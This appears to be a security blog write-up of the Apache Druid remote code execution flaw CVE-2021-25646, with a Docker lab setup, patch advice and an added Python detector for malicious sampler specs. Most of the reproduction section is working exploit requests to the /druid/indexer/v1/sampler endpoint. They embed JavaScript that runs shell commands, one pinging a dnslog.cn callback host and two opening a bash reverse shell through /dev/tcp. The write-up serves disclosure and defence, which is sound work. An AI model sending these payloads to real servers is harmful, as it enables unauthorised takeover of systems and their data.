Apache Druid Command Execution Vulnerability (CVE-2021-25646)

I. Vulnerability description

Apache Druid includes code that executes user-provided JavaScript embedded in various kinds of requests. This feature is intended for high-trust environments and is disabled by default. However, in Druid 0.20.0 and earlier, an authenticated user can send a specially crafted request that makes Druid run the embedded JavaScript regardless of that setting, which allows arbitrary code execution. An attacker can therefore construct a malicious request directly and take control of the server.

II. Affected versions

Apache Druid < 0.20.1

III. Vulnerability environment and reproduction

Docker environment:

docker pull fokkodriesprong/docker-druid 
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

Start the container and open the console:

Vulnerability reproduction:

POC:

POST /druid/indexer/v1/sampler HTTP/1.1
Host: IP:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close

{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "inputSource": {
        "type": "inline",
        "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"1 2020-12-12 T12. 040 z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot \",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"
      },
      "inputFormat": {"type": "json", "keepNullColumns": true}
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {"column": "timestamp", "format": "iso"},
      "dimensionsSpec": {},
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "dimension": "added",
          "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1')}",
          "": {"enabled": true}
        }
      }
    },
    "type": "index",
    "tuningConfig": {"type": "index"}
  },
  "samplerConfig": {"numRows": 500, "timeoutMs": 15000}
}

1. DNSlog:

DNS records:

Specific data package:

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1018
Connection: close

{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "inputSource": {
        "type": "inline",
        "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"1 2020-12-12 T12. 040 z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot \",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"
      },
      "inputFormat": {"type": "json", "keepNullColumns": true}
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {"column": "timestamp", "format": "iso"},
      "dimensionsSpec": {},
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "dimension": "added",
          "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping gpg7qd.dnslog.cn')}",
          "": {"enabled": true}
        }
      }
    },
    "type": "index",
    "tuningConfig": {"type": "index"}
  },
  "samplerConfig": {"numRows": 500, "timeoutMs": 15000}
}

2. Reverse shell

Specific data package:

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1044
Connection: close

{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "inputSource": {
        "type": "inline",
        "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"1 2020-12-12 T12. 040 z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot \",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"
      },
      "inputFormat": {"type": "json", "keepNullColumns": true}
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {"column": "timestamp", "format": "iso"},
      "dimensionsSpec": {},
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "dimension": "added",
          "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1')}",
          "": {"enabled": true}
        }
      }
    },
    "type": "index",
    "tuningConfig": {"type": "index"}
  },
  "samplerConfig": {"numRows": 500, "timeoutMs": 15000}
}

A simple Python script for the reverse shell:

IV. Security recommendations

You are advised to upgrade Apache Druid to 0.20.1 or later as soon as possible.
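For defenders who cannot patch immediately, the request bodies above have a recognisable shape: a "javascript" filter in the spec, plus the empty-string key "" carrying {"enabled": true}, which the PoC uses to supply its own JavaScript config inside the object. The following is an added detection example (not code from the original post or from the Druid project) that walks a submitted sampler or task spec and reports every place where one of those two markers appears. It assumes the body has already been captured, for example by a reverse proxy in front of /druid/indexer/v1/sampler or from access-log post-data; the two sample specs at the bottom are constructed for the demonstration, with the command string replaced by a harmless placeholder.

```python
"""Added example: flag Druid specs that enable embedded JavaScript execution.

Two markers are checked, both taken from the CVE-2021-25646 PoC above:
  * any object whose "type" is "javascript" (JS filter, transform, aggregator, ...)
  * any object carrying the empty-string key "" with {"enabled": true}, the
    per-object JavaScript config override the PoC uses to bypass the global setting
"""
import json

JS_TYPE = "javascript"


def find_javascript_usage(body):
    """Return [(json_path, reason), ...] for every marker found in a parsed spec."""
    findings = []

    def walk(node, path):
        if isinstance(node, dict):
            if node.get("type") == JS_TYPE:
                findings.append((path or "$", "type=javascript"))
            override = node.get("")
            if isinstance(override, dict) and override.get("enabled") is True:
                findings.append((path or "$", 'empty-key {"enabled": true} override'))
            for key, value in node.items():
                walk(value, f"{path}.{key}" if path else key)
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")

    walk(body, "")
    return findings


def scan_raw(raw_body):
    """Parse a raw request body and scan it; non-JSON bodies yield no findings."""
    try:
        body = json.loads(raw_body)
    except (ValueError, TypeError):
        return []
    return find_javascript_usage(body)


def is_suspicious(raw_body):
    """True when the raw body carries at least one JavaScript-execution marker."""
    return bool(scan_raw(raw_body))


# Constructed sample bodies (hypothetical data for this example).
BENIGN_SPEC = json.dumps({
    "type": "index",
    "spec": {
        "ioConfig": {
            "type": "index",
            "inputSource": {"type": "inline", "data": "{\"added\":1}"},
            "inputFormat": {"type": "json"},
        },
        "dataSchema": {
            "dataSource": "sample",
            "transformSpec": {
                "transforms": [],
                "filter": {"type": "selector", "dimension": "added", "value": "1"},
            },
        },
    },
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
})

# Same layout as the PoC's filter, with the command replaced by a placeholder.
MALICIOUS_SPEC = json.dumps({
    "type": "index",
    "spec": {
        "dataSchema": {
            "transformSpec": {
                "filter": {
                    "type": "javascript",
                    "dimension": "added",
                    "function": "function(value) { /* placeholder */ }",
                    "": {"enabled": True},
                }
            }
        }
    },
})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_SPEC), ("malicious", MALICIOUS_SPEC)):
        print(name, is_suspicious(body), scan_raw(body))
```

Running the block prints no findings for the benign spec and two findings at spec.dataSchema.transformSpec.filter for the malicious one. Because the walk is generic, it also catches the same markers placed in transforms, aggregators or extraction functions rather than only in the filter position the PoC uses; a hit on the empty-key override alone is worth alerting on even when the type is not "javascript", since a legitimate spec has no reason to carry that key.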

Druid.apache.org/downloads.h…

Github.com/apache/drui…


thelostworld

Safe road, side by side with you !!!!

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq\_3760279…

Personal blog garden: www.cnblogs.com/thelostworl…

FREEBUF homepage: www.freebuf.com/author/thel…